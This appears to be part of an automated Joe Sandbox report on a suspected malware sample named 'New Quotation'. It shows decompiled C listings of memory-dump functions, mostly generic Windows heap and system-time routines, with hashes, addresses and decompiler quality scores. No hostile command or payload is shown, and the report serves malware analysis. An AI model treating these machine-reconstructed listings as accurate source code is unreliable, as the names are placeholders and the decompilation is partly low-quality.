                                                                                                                                                                                          0x1d82d5c7
                                                                                                                                                                                          0x1d82d5cd
                                                                                                                                                                                          0x1d82d5d9
                                                                                                                                                                                          0x1d82d5e0
                                                                                                                                                                                          0x1d82d5ec
                                                                                                                                                                                          0x1d82d5f5
                                                                                                                                                                                          0x1d82d5f6
                                                                                                                                                                                          0x1d82d602
                                                                                                                                                                                          0x1d82d608
                                                                                                                                                                                          0x1d82d60a
                                                                                                                                                                                          0x1d82d60b
                                                                                                                                                                                          0x1d82d617
                                                                                                                                                                                          0x1d82d623
                                                                                                                                                                                          0x1d82d626
                                                                                                                                                                                          0x1d82d629
                                                                                                                                                                                          0x1d82d62c
                                                                                                                                                                                          0x1d82d62f
                                                                                                                                                                                          0x1d82d63a
                                                                                                                                                                                          0x1d82d641
                                                                                                                                                                                          0x1d82d644
                                                                                                                                                                                          0x1d82d647
                                                                                                                                                                                          0x1d82d64a
                                                                                                                                                                                          0x1d82d650
                                                                                                                                                                                          0x1d82d653
                                                                                                                                                                                          0x1d82d656
                                                                                                                                                                                          0x1d82d659
                                                                                                                                                                                          0x1d82d65c
                                                                                                                                                                                          0x1d82d65f
                                                                                                                                                                                          0x1d82d662
                                                                                                                                                                                          0x1d82d668
                                                                                                                                                                                          0x1d82d66b
                                                                                                                                                                                          0x1d82d66e
                                                                                                                                                                                          0x1d82d66e
                                                                                                                                                                                          0x1d7cddf1
                                                                                                                                                                                          0x1d7cde19

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: ab7302f98e2bbd8c6252a06a903e92dd70870c2a3ab4c8ca1530695f0d3b13a8
                                                                                                                                                                                          • Instruction ID: 949b440431d757b475b8c3ceccd9a2dc61e67903cfee7d7cc277bec89c0fc8c9
                                                                                                                                                                                          • Opcode Fuzzy Hash: ab7302f98e2bbd8c6252a06a903e92dd70870c2a3ab4c8ca1530695f0d3b13a8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3141B5B5D00229DEDB20CFAAD980AEDFBF4BB48314F5041AEE509E7240D774AA45CF51
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7C9D46 Relevance: .1, Instructions: 90COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                          			E1D7C9D46(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				void* _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t29;
				void* _t56;
				intOrPtr _t58;
				signed int _t65;
				void* _t67;
				intOrPtr* _t69;
				void* _t71;

				_t57 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t69 = __ecx;
				_push(__edx);
				_v8 = __edx;
				_v12 = __ecx;
				if(E1D7F3D20(__edx, __edi, __ecx, __eflags) == 0) {
					_t29 = 0xc000000d;
				} else {
					_t56 =  *_t69;
					_push(__edi);
					_t65 = 0x00000017 + ( *(__edx + 1) & 0x000000ff) * 0x00000004 & 0xfffffff8;
					_t32 =  *((intOrPtr*)(_t56 + 8)) + _t65;
					if( *((intOrPtr*)(_t56 + 8)) + _t65 < _t65) {
						_t29 = 0xc0000173;
					} else {
						_t71 = E1D7E5D90(_t57,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t32);
						if(_t71 == 0) {
							_t29 = 0xc000009a;
						} else {
							E1D8188C0(_t71, _t56,  *((intOrPtr*)(_t56 + 8)));
							 *((intOrPtr*)(_t71 + 8)) =  *((intOrPtr*)(_t56 + 8)) + _t65;
							 *((intOrPtr*)(_t71 + 4)) =  *((intOrPtr*)(_t56 + 4)) + 1;
							_t58 =  *((intOrPtr*)(_t56 + 8));
							 *((intOrPtr*)(_t58 + _t71)) = (0 | _a4 != 0x00000000) + 2;
							 *(_t58 + _t71 + 4) = _t65;
							E1D8188C0(_t58 + 8 + _t71, _v8, 8 + ( *(_v8 + 1) & 0x000000ff) * 4);
							_t67 = E1D7C94C8(_t71);
							if(_t67 < 0) {
								E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t71);
								_t29 = _t67;
							} else {
								E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
								 *_v12 = _t71;
								_t29 = 0;
							}
						}
					}
				}
				return _t29;
			}















                                                                                                                                                                                          0x1d7c9d46
                                                                                                                                                                                          0x1d7c9d4b
                                                                                                                                                                                          0x1d7c9d4c
                                                                                                                                                                                          0x1d7c9d51
                                                                                                                                                                                          0x1d7c9d53
                                                                                                                                                                                          0x1d7c9d54
                                                                                                                                                                                          0x1d7c9d57
                                                                                                                                                                                          0x1d7c9d61
                                                                                                                                                                                          0x1d82bb94
                                                                                                                                                                                          0x1d7c9d67
                                                                                                                                                                                          0x1d7c9d6b
                                                                                                                                                                                          0x1d7c9d6d
                                                                                                                                                                                          0x1d7c9d78
                                                                                                                                                                                          0x1d7c9d7b
                                                                                                                                                                                          0x1d7c9d7f
                                                                                                                                                                                          0x1d82bb9e
                                                                                                                                                                                          0x1d7c9d85
                                                                                                                                                                                          0x1d7c9d96
                                                                                                                                                                                          0x1d7c9d9a
                                                                                                                                                                                          0x1d82bba8
                                                                                                                                                                                          0x1d7c9da0
                                                                                                                                                                                          0x1d7c9da5
                                                                                                                                                                                          0x1d7c9db2
                                                                                                                                                                                          0x1d7c9db9
                                                                                                                                                                                          0x1d7c9dc1
                                                                                                                                                                                          0x1d7c9dca
                                                                                                                                                                                          0x1d7c9dcd
                                                                                                                                                                                          0x1d7c9de4
                                                                                                                                                                                          0x1d7c9df3
                                                                                                                                                                                          0x1d7c9df7
                                                                                                                                                                                          0x1d82bbbf
                                                                                                                                                                                          0x1d82bbc4
                                                                                                                                                                                          0x1d7c9dfd
                                                                                                                                                                                          0x1d7c9e09
                                                                                                                                                                                          0x1d7c9e11
                                                                                                                                                                                          0x1d7c9e13
                                                                                                                                                                                          0x1d7c9e13
                                                                                                                                                                                          0x1d7c9df7
                                                                                                                                                                                          0x1d7c9d9a
                                                                                                                                                                                          0x1d7c9e15
                                                                                                                                                                                          0x1d7c9e19

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 8c1bd2c5909469b086105e0157cf97be3f28b4ffec6a9e1badc9caecc0ed897d
                                                                                                                                                                                          • Instruction ID: 4f1e76abfad56675af0ee6bc32cdfcdc049f1554be641a4d5d3d3480cbf5ee83
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c1bd2c5909469b086105e0157cf97be3f28b4ffec6a9e1badc9caecc0ed897d
                                                                                                                                                                                          • Instruction Fuzzy Hash: B831F276600604EFC712CF18CC80B5ABBB9EF45764F1A8099E548CF252D635EE41CBA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D826F70 Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                          			E1D826F70(intOrPtr* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				signed char _v8;
				intOrPtr* _v12;
				signed char* _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed char _t34;
				intOrPtr _t51;
				intOrPtr* _t53;
				intOrPtr* _t56;
				intOrPtr _t58;
				intOrPtr* _t59;
				intOrPtr* _t60;
				signed char* _t64;
				intOrPtr* _t68;
				intOrPtr* _t69;
				intOrPtr* _t70;
				intOrPtr _t71;

				if(E1D7E3C40() == 0) {
					_t53 = 0x7ffe03c8;
					_t64 = 0x7ffe025c;
					_t56 = 0x7ffe0020;
					_t6 = _t53 + 8; // 0x7ffe03d0
					_t68 = _t6;
				} else {
					_t51 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					_t64 = _t51 + 0x24c;
					_t56 = _t51 + 0x250;
					_t53 = _t51 + 0x260;
					_t68 = _t51 + 0x268;
				}
				_v28 = _t68;
				_v12 = _t53;
				_v20 = _t56;
				_v16 = _t64;
				while(1) {
					_t34 =  *_t64;
					_v8 = _t34;
					if((_t34 & 0x00000001) == 0) {
						goto L7;
					}
					L5:
					asm("pause");
					continue;
					while(1) {
						L7:
						_t58 =  *((intOrPtr*)(_t56 + 4));
						_v24 =  *_t56;
						if(_t58 ==  *((intOrPtr*)(_t56 + 8))) {
							break;
						}
						asm("pause");
					}
					_t69 = _a4;
					 *_t69 = _v24;
					_t70 = _v28;
					 *((intOrPtr*)(_t69 + 4)) = _t58;
					_t59 = _a8;
					if(_t59 != 0) {
						 *_t59 =  *_t53;
						 *((intOrPtr*)(_t59 + 4)) =  *((intOrPtr*)(_t53 + 4));
					}
					_t60 = _a12;
					if(_t60 != 0) {
						 *_t60 =  *_t70;
						 *((intOrPtr*)(_t60 + 4)) =  *((intOrPtr*)(_t70 + 4));
					}
					_t71 =  *0x7FFE0014;
					if( *0x7ffe0018 !=  *0x7ffe001c) {
						do {
							asm("pause");
							_t71 =  *0x7ffe0014;
						} while ( *0x7FFE0018 !=  *0x7FFE001C);
						_t56 = _v20;
						_t64 = _v16;
						_t53 = _v12;
					}
					if(_v8 !=  *_t64) {
						goto L5;
					}
					return _t71;
				}
			}





















                                                                                                                                                                                          0x1d826f85
                                                                                                                                                                                          0x1d826faa
                                                                                                                                                                                          0x1d826faf
                                                                                                                                                                                          0x1d826fb4
                                                                                                                                                                                          0x1d826fb9
                                                                                                                                                                                          0x1d826fb9
                                                                                                                                                                                          0x1d826f87
                                                                                                                                                                                          0x1d826f8d
                                                                                                                                                                                          0x1d826f90
                                                                                                                                                                                          0x1d826f96
                                                                                                                                                                                          0x1d826f9c
                                                                                                                                                                                          0x1d826fa2
                                                                                                                                                                                          0x1d826fa2
                                                                                                                                                                                          0x1d826fbc
                                                                                                                                                                                          0x1d826fc0
                                                                                                                                                                                          0x1d826fc4
                                                                                                                                                                                          0x1d826fc8
                                                                                                                                                                                          0x1d826fcc
                                                                                                                                                                                          0x1d826fcc
                                                                                                                                                                                          0x1d826fce
                                                                                                                                                                                          0x1d826fd4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d826fd6
                                                                                                                                                                                          0x1d826fd6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d826fdc
                                                                                                                                                                                          0x1d826fdc
                                                                                                                                                                                          0x1d826fdc
                                                                                                                                                                                          0x1d826fe1
                                                                                                                                                                                          0x1d826fea
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d826fda
                                                                                                                                                                                          0x1d826fda
                                                                                                                                                                                          0x1d826fec
                                                                                                                                                                                          0x1d826ff3
                                                                                                                                                                                          0x1d826ff7
                                                                                                                                                                                          0x1d826ffb
                                                                                                                                                                                          0x1d826ffe
                                                                                                                                                                                          0x1d827003
                                                                                                                                                                                          0x1d827007
                                                                                                                                                                                          0x1d82700c
                                                                                                                                                                                          0x1d82700c
                                                                                                                                                                                          0x1d82700f
                                                                                                                                                                                          0x1d827014
                                                                                                                                                                                          0x1d827018
                                                                                                                                                                                          0x1d82701d
                                                                                                                                                                                          0x1d82701d
                                                                                                                                                                                          0x1d82702a
                                                                                                                                                                                          0x1d827035
                                                                                                                                                                                          0x1d827042
                                                                                                                                                                                          0x1d827042
                                                                                                                                                                                          0x1d827046
                                                                                                                                                                                          0x1d82704a
                                                                                                                                                                                          0x1d82704e
                                                                                                                                                                                          0x1d827052
                                                                                                                                                                                          0x1d827056
                                                                                                                                                                                          0x1d827056
                                                                                                                                                                                          0x1d827060
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82706e
                                                                                                                                                                                          0x1d82706e

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                                                                                                                                          • Instruction ID: 95b379270e679cdc8ccebbe3f9fda4c9a6d573003a6777ff6990f0bf8f3b0a2b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                                                                                                                                          • Instruction Fuzzy Hash: C2314775604206CFCB00CF19C480956FBE5FF88714B6586A9F9589B325E731FD46CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7D6D91 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 45%
                                                                                                                                                                                          			E1D7D6D91(void* __ecx, signed int __edx, signed int _a4, char _a8) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t34;
				void* _t48;
				signed int _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t58;
				void* _t59;
				void* _t61;
				signed int _t62;

				_t56 = __edx;
				_v8 =  *0x1d8cb370 ^ _t62;
				_t61 = __ecx;
				_t51 =  *((intOrPtr*)(__edx + 0xc8));
				_t58 = _a4;
				_v24 = _t51;
				_t34 =  *((intOrPtr*)(__ecx + 0x104));
				if(_t58 != _t51) {
					if(_t34 == 0xffffffff) {
						if( *((char*)(__edx + 0xd0)) == 0) {
							 *((char*)(__edx + 0xd0)) = 1;
						} else {
							asm("lock dec dword [eax+ecx*4]");
						}
						asm("lock inc dword [eax+edi*4]");
					}
					 *(_t56 + 0xc8) = _t58;
					_t52 =  *((intOrPtr*)(_t61 + 0x20));
					_push(_t48);
					_t49 =  *(_t58 * 0xc + _t52 + 4) & 0x0000ffff;
					_v28 =  *(_v24 * 0xc + _t52 + 4) & 0x0000ffff;
					if(E1D7E3C40() == 0) {
						_t34 = 0x7ffe0386;
					} else {
						_t34 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					}
					if( *_t34 != 0) {
						_t56 = _v24;
						_t34 = E1D8A51B6(_t61, _v24, _t58, _v28, _t49);
					}
					if(_v28 != _t49) {
						asm("stosd");
						_push(0xc);
						asm("stosd");
						asm("stosd");
						_v20 = _v20 & 0x00000000;
						_push( &_v20);
						_push(0x1e);
						_push(0xfffffffe);
						_v16 = _t49;
						E1D812A60();
						_push("true");
						_push( &_a8);
						_push(0xd);
						_push(0xfffffffe);
						_t34 = E1D812A60();
					}
					_pop(_t48);
				} else {
					if(_t34 == 0xffffffff) {
						if( *((char*)(__edx + 0xd0)) == 0) {
							 *((char*)(__edx + 0xd0)) = 1;
							_t34 =  *((intOrPtr*)(__ecx + 0x1c));
							asm("lock inc dword [eax+edi*4]");
						}
					}
				}
				_pop(_t59);
				return E1D814B50(_t34, _t48, _v8 ^ _t62, _t56, _t59, _t61);
			}




















                                                                                                                                                                                          0x1d7d6d91
                                                                                                                                                                                          0x1d7d6da0
                                                                                                                                                                                          0x1d7d6da4
                                                                                                                                                                                          0x1d7d6da6
                                                                                                                                                                                          0x1d7d6dad
                                                                                                                                                                                          0x1d7d6db0
                                                                                                                                                                                          0x1d7d6db3
                                                                                                                                                                                          0x1d7d6dbb
                                                                                                                                                                                          0x1d8313ca
                                                                                                                                                                                          0x1d8313d3
                                                                                                                                                                                          0x1d8313de
                                                                                                                                                                                          0x1d8313d5
                                                                                                                                                                                          0x1d8313d8
                                                                                                                                                                                          0x1d8313d8
                                                                                                                                                                                          0x1d8313e8
                                                                                                                                                                                          0x1d8313e8
                                                                                                                                                                                          0x1d8313ef
                                                                                                                                                                                          0x1d8313f5
                                                                                                                                                                                          0x1d8313f8
                                                                                                                                                                                          0x1d8313f9
                                                                                                                                                                                          0x1d831407
                                                                                                                                                                                          0x1d831411
                                                                                                                                                                                          0x1d831423
                                                                                                                                                                                          0x1d831413
                                                                                                                                                                                          0x1d83141c
                                                                                                                                                                                          0x1d83141c
                                                                                                                                                                                          0x1d83142b
                                                                                                                                                                                          0x1d83142d
                                                                                                                                                                                          0x1d831437
                                                                                                                                                                                          0x1d831437
                                                                                                                                                                                          0x1d831440
                                                                                                                                                                                          0x1d831447
                                                                                                                                                                                          0x1d831448
                                                                                                                                                                                          0x1d83144a
                                                                                                                                                                                          0x1d83144b
                                                                                                                                                                                          0x1d83144f
                                                                                                                                                                                          0x1d831453
                                                                                                                                                                                          0x1d831454
                                                                                                                                                                                          0x1d831456
                                                                                                                                                                                          0x1d831458
                                                                                                                                                                                          0x1d83145c
                                                                                                                                                                                          0x1d831461
                                                                                                                                                                                          0x1d831466
                                                                                                                                                                                          0x1d831467
                                                                                                                                                                                          0x1d831469
                                                                                                                                                                                          0x1d83146b
                                                                                                                                                                                          0x1d83146b
                                                                                                                                                                                          0x1d831470
                                                                                                                                                                                          0x1d7d6dc1
                                                                                                                                                                                          0x1d7d6dc4
                                                                                                                                                                                          0x1d8313ae
                                                                                                                                                                                          0x1d8313b4
                                                                                                                                                                                          0x1d8313bb
                                                                                                                                                                                          0x1d8313be
                                                                                                                                                                                          0x1d8313be
                                                                                                                                                                                          0x1d8313ae
                                                                                                                                                                                          0x1d7d6dc4
                                                                                                                                                                                          0x1d7d6dcd
                                                                                                                                                                                          0x1d7d6dd7

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: ce39df5f9da11de9628b78d38ae2851b02e61b76cdf402e47cb188bfe8e9e430
                                                                                                                                                                                          • Instruction ID: 743901d6f9c670077b7ac1321218720a3fc7cfa34102e71dee60ab41e89d494e
                                                                                                                                                                                          • Opcode Fuzzy Hash: ce39df5f9da11de9628b78d38ae2851b02e61b76cdf402e47cb188bfe8e9e430
                                                                                                                                                                                          • Instruction Fuzzy Hash: BF310231900609AEDB20CBA8C840FAEF7B5BF44B15F01435AE5199B1E1CB74E985C792
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D88BF4D Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                          			E1D88BF4D(void* __ecx, void* __edx, intOrPtr _a4, char _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t50;
				intOrPtr _t51;
				signed int _t52;
				signed int _t54;
				void* _t57;
				void* _t61;
				void* _t62;

				_t57 = __edx;
				_t61 = 0;
				_t62 = __ecx;
				if(__edx < 1) {
					_push("true");
					_pop(_t57);
				}
				_t50 = _a4;
				if(_t50 < 1) {
					_t50 = 0x28;
				}
				if(_t62 != 0 && _t57 >= 1 && _t50 >= 1) {
					_t48 = _t57;
					if(_t57 >= ( *(_t62 + 6) & 0x0000ffff)) {
						_t51 = _t50;
						_v8 = _t51;
						if(_t51 >= ( *(_t62 + 0xa) & 0x0000ffff)) {
							_t52 = 2;
							if(E1D804CF8( &_v12, ( *(_t62 + 4) & 0x0000ffff) * _t52, ( *(_t62 + 4) & 0x0000ffff) * _t52 >> 0x20) >= 0) {
								_t54 = 2;
								if(E1D804CF8( &_v16, ( *(_t62 + 8) & 0x0000ffff) * _t54, ( *(_t62 + 8) & 0x0000ffff) * _t54 >> 0x20) >= 0) {
									_t61 = E1D7CDB8D(_t48, _v8);
									if(_t61 != 0) {
										E1D8188C0( *((intOrPtr*)(_t61 + 0xc)),  *((intOrPtr*)(_t62 + 0xc)), _v12);
										E1D8188C0( *((intOrPtr*)(_t61 + 0x10)),  *((intOrPtr*)(_t62 + 0x10)), _v16);
										 *((short*)(_t61 + 6)) =  *(_t62 + 6);
										 *((short*)(_t61 + 0xa)) =  *(_t62 + 0xa);
										if(_a8 == 0) {
											E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t62);
										}
									}
								}
							}
						}
					}
				}
				return _t61;
			}













                                                                                                                                                                                          0x1d88bf4d
                                                                                                                                                                                          0x1d88bf5b
                                                                                                                                                                                          0x1d88bf5d
                                                                                                                                                                                          0x1d88bf62
                                                                                                                                                                                          0x1d88bf64
                                                                                                                                                                                          0x1d88bf66
                                                                                                                                                                                          0x1d88bf66
                                                                                                                                                                                          0x1d88bf67
                                                                                                                                                                                          0x1d88bf6d
                                                                                                                                                                                          0x1d88bf71
                                                                                                                                                                                          0x1d88bf71
                                                                                                                                                                                          0x1d88bf74
                                                                                                                                                                                          0x1d88bf90
                                                                                                                                                                                          0x1d88bf95
                                                                                                                                                                                          0x1d88bf9f
                                                                                                                                                                                          0x1d88bfa2
                                                                                                                                                                                          0x1d88bfa7
                                                                                                                                                                                          0x1d88bfb3
                                                                                                                                                                                          0x1d88bfc2
                                                                                                                                                                                          0x1d88bfca
                                                                                                                                                                                          0x1d88bfd9
                                                                                                                                                                                          0x1d88bfe5
                                                                                                                                                                                          0x1d88bfe9
                                                                                                                                                                                          0x1d88bff4
                                                                                                                                                                                          0x1d88c005
                                                                                                                                                                                          0x1d88c015
                                                                                                                                                                                          0x1d88c01d
                                                                                                                                                                                          0x1d88c021
                                                                                                                                                                                          0x1d88c02f
                                                                                                                                                                                          0x1d88c02f
                                                                                                                                                                                          0x1d88c021
                                                                                                                                                                                          0x1d88bfe9
                                                                                                                                                                                          0x1d88bfd9
                                                                                                                                                                                          0x1d88bfc2
                                                                                                                                                                                          0x1d88bfa7
                                                                                                                                                                                          0x1d88bf95
                                                                                                                                                                                          0x1d88c03a

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 913e4e62fe5ed1eb351d392b489c690631754249b42677e026e479e93032757f
                                                                                                                                                                                          • Instruction ID: ab0a537464c0ee34a6e176d5d4cec958696b5f3ffa9004384d73ca3c3d6eb421
                                                                                                                                                                                          • Opcode Fuzzy Hash: 913e4e62fe5ed1eb351d392b489c690631754249b42677e026e479e93032757f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F21303A601692BACB149BFECC00ABBBB74EF40790F41841AFB958F561E735E941C761
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7D3E14 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 60%
                                                                                                                                                                                          			E1D7D3E14(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E1D7D4D00();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = E1D7E5D90(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E1D7D4D00() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                                                                                                                                                          0x1d7d3e21
                                                                                                                                                                                          0x1d7d3e24
                                                                                                                                                                                          0x1d7d3e26
                                                                                                                                                                                          0x1d7d3e2b
                                                                                                                                                                                          0x1d7d3e2d
                                                                                                                                                                                          0x1d7d3e35
                                                                                                                                                                                          0x1d7d3e3e
                                                                                                                                                                                          0x1d7d3e3f
                                                                                                                                                                                          0x1d7d3e40
                                                                                                                                                                                          0x1d7d3e44
                                                                                                                                                                                          0x1d7d3e47
                                                                                                                                                                                          0x1d7d3e4e
                                                                                                                                                                                          0x1d7d3e4f
                                                                                                                                                                                          0x1d7d3e55
                                                                                                                                                                                          0x1d7d3e56
                                                                                                                                                                                          0x1d7d3e5d
                                                                                                                                                                                          0x1d7d3e77
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d3e6a
                                                                                                                                                                                          0x1d7d3e6f
                                                                                                                                                                                          0x1d7d3e6f
                                                                                                                                                                                          0x1d7d3e5f
                                                                                                                                                                                          0x1d7d3e5f
                                                                                                                                                                                          0x1d7d3e64
                                                                                                                                                                                          0x1d7d3e7b
                                                                                                                                                                                          0x1d7d3e80
                                                                                                                                                                                          0x1d82ffec
                                                                                                                                                                                          0x1d82fff0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82fff6
                                                                                                                                                                                          0x1d82fff6
                                                                                                                                                                                          0x1d7d3e89
                                                                                                                                                                                          0x1d7d3e8a
                                                                                                                                                                                          0x1d7d3e8b
                                                                                                                                                                                          0x1d7d3e8c
                                                                                                                                                                                          0x1d7d3e8e
                                                                                                                                                                                          0x1d7d3e8f
                                                                                                                                                                                          0x1d7d3e92
                                                                                                                                                                                          0x1d7d3e9a
                                                                                                                                                                                          0x1d830000
                                                                                                                                                                                          0x1d83001a
                                                                                                                                                                                          0x1d83001a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d830000
                                                                                                                                                                                          0x1d7d3ea6
                                                                                                                                                                                          0x1d7d3eab
                                                                                                                                                                                          0x1d7d3eab
                                                                                                                                                                                          0x1d7d3e68
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
